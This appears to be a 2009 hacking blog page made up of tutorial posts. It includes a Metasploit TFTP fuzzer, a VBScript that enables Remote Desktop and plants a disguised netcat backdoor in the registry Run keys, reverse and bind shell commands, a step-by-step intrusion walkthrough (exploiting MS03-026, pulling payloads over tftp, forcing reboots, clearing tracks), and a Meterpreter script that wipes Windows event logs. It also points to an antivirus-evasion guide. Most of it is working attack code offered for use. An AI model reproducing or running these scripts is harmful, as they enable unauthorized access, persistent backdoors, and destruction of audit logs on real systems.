Sunday, November 22, 2009

Simple FTP Fuzzer

Guys, want to see the FTP Fuzzer?
Here is an example...

#Metasploit

require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => '3Com TFTP Fuzzer',
'Version' => '$Revision: 1 $',
'Description' => '3Com TFTP Fuzzer Passes Overly Long Transport Mode String',
'Author' => 'Your name here',
'License' => MSF_LICENSE
)
register_options( [
Opt::RPORT(69)
], self.class)
end
def run_host(ip)
# Create an unbound UDP socket
udp_sock = Rex::Socket::Udp.create(
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
}
)
count = 10 # Set an initial count
while count < 2000 # While the count is under 2000 run
evil = "A" * count # Set a number of "A"s equal to count
pkt = "\x00\x02" + "\x41" + "\x00" + evil + "\x00" # Define the payload
udp_sock.sendto(pkt, ip, datastore['RPORT']) # Send the packet
print_status("Sending: #{evil}") # Status update
resp = udp_sock.get(1) # Capture the response
count += 10 # Increase count by 10, and loop
end
end
end

Tuesday, November 10, 2009

Metasploit Framework 3.3 No GUI & Web

As of Metasploit Framework 3.3, msfgui and msfweb will no longer be supported.

:) cihuy...

Tutorial: VBScript in Action

Here is an example of a VBScript that will Enable Remote Desktop and Plant Trojan or Backdoor (such as Netcat) or known as Persistent Netcat.

' This VBScript will do the following:

' 1. Enable Remote Desktop
' 2. Plant Trojan or Backdoor in the Registry
'
' Rename your Netcat (nc.exe) as winntsvr.exe as a "camouflage"

Dim objShell, RegLocate, RegLocate1
Set objShell = WScript.CreateObject("WScript.Shell")
On Error Resume Next

' Enable Remote Desktop
RegLocate = "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
objShell.RegWrite RegLocate,"0","REG_DWORD"

' Plant Trojan or Backdoor in the Registry
RegLocate =
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update"

objShell.RegWrite RegLocate,"C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe","REG_SZ"

RegLocate =
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update"

objShell.RegWrite RegLocate,"C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe","REG_SZ"

' Reverse Connect
' On the Target: winntsvr -v -L -p443 -d -e cmd.exe
' On the Attacker: nc -v 131.107.1.254 443

' Bind Connect
' On the Target: winntsvr -v 131.107.1.222 443 -d -e cmd.exe
' On the Attacker: nc -v -l -p443

WScript.Quit

Netcat and AntiVirus (bypass) ...

If your Netcat is detected by AntiVirus, you can do something with it.

Check this out:
http://www.packetstormsecurity.org/papers/virus/Taking_Back_Netcat.pdf

Good tutorial :)

Tutorial: Complete Hacking Steps

Complete Hacking Steps (TEST-XP2 vs DEN-WEB2) - Classic Method 

TEST-XP2 = 131.107.1.222
DEN-WEB2 = 131.107.1.254


Step 1: Information Gathering (Scanning)

Scan Target with Nmap:
nmap -A 131.107.1.254

Step 2: Vulnerability Identification


Use Google search to find vulnerabilities on 131.107.1.254, based on the result of Step 1.

Example: MS03-026 (MS-RPC DCOM Vulnerability) or Scan with Nessus vulnerability scanner.

Step 3: Gain Access/Exploitation

Use Metasploit Framework 2.x or 3.x. Find the correct module (eq. MS03-026)

>> Metasploit 2.x

msf > use msrpc_dcom_ms03_026
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit

>> Metasploit 3.x

msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit

Step 4: Maintain Access


Ensure that you have launched the TFTPD32 (tftp server).

Upload all necessary scripts...
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET start.cmd
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET cleanup.cmd

Run the script...
C:\WINDOWS\System32>start.cmd

On TEST-XP2 machine, do the following:

Connect via Remote Desktop ...
User: myadmin
Password: P@ssw0rd

Open a new command prompt.
Launch Netcat to connect to the open port 443 on the remote machine...
Z:\Tools\NC>nc -v 131.107.1.254 443

Open another new command prompt.
Force the Target machine to reboot ...

Option 1: PSShutdown
Z:\Tools\SysinternalsSuite>psshutdown -r -f -u myadmin -p P@ssw0rd \\131.107.1.254

Option 2: Metasploit module
msf > use msasn1_ms04_007_killbill
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > exploit

After rebooted, log on to DEN-WEB2 machine with:
User: administrator
Password: P@ssw0rd

Switch to TEST-XP2 machine.

You should see your Netcat get connected.
Now you can connect to the Target machine at anytime.

If not, re-run the command:

Z:\Tools\NC>nc -v 131.107.1.254 443

Step 5: Cover Tracks/Housekeeping

Close your Metasploit Framework console window.
Switch to the Netcat opened command prompt.

Run the housekeeping script...

C:\WINDOWS\System32>cleanup.cmd

Check the Audit settings and Event logs. All should be cleared.

Monday, November 9, 2009

New Security Books - Recommended by Me!

Check this out:

Nmap Network Scanning
http://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717/ref=sr_1_1?ie=UTF8&s=books&qid=1257826537&sr=8-1

Professional Penetration Tester
http://www.amazon.com/Professional-Penetration-Testing-Creating-Operating/dp/1597494259/ref=sr_1_1?ie=UTF8&s=books&qid=1257826622&sr=1-1

I have read these books and I found that they have discussed lot of interesting topics. Must have for Security Professionals.

For DVD contents, please email me.

Tuesday, November 3, 2009

Metasploit Framework 3.x Meterpreter Script

In the last step of Hacking, we know that we need to "clear the tracks" or known as "housekeeping". If you use meterpreter payload, you could run this script to clear the logs on the victim machine:

ClearLogs.rb

# Clears Windows Event Logs

evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]
puts ("Clearing Event Logs, this will leave an event 517")
evtlogs.each do |evl|
puts ("Clearing the #{evl} Event Log")
log = client.sys.eventlog.open(evl)
log.clear
end
puts ("All Clear! You are a Ninja!")

Save it and call it within the meterpreter.

meterpreter > run clearlogs

and Bingo! all logs are cleared...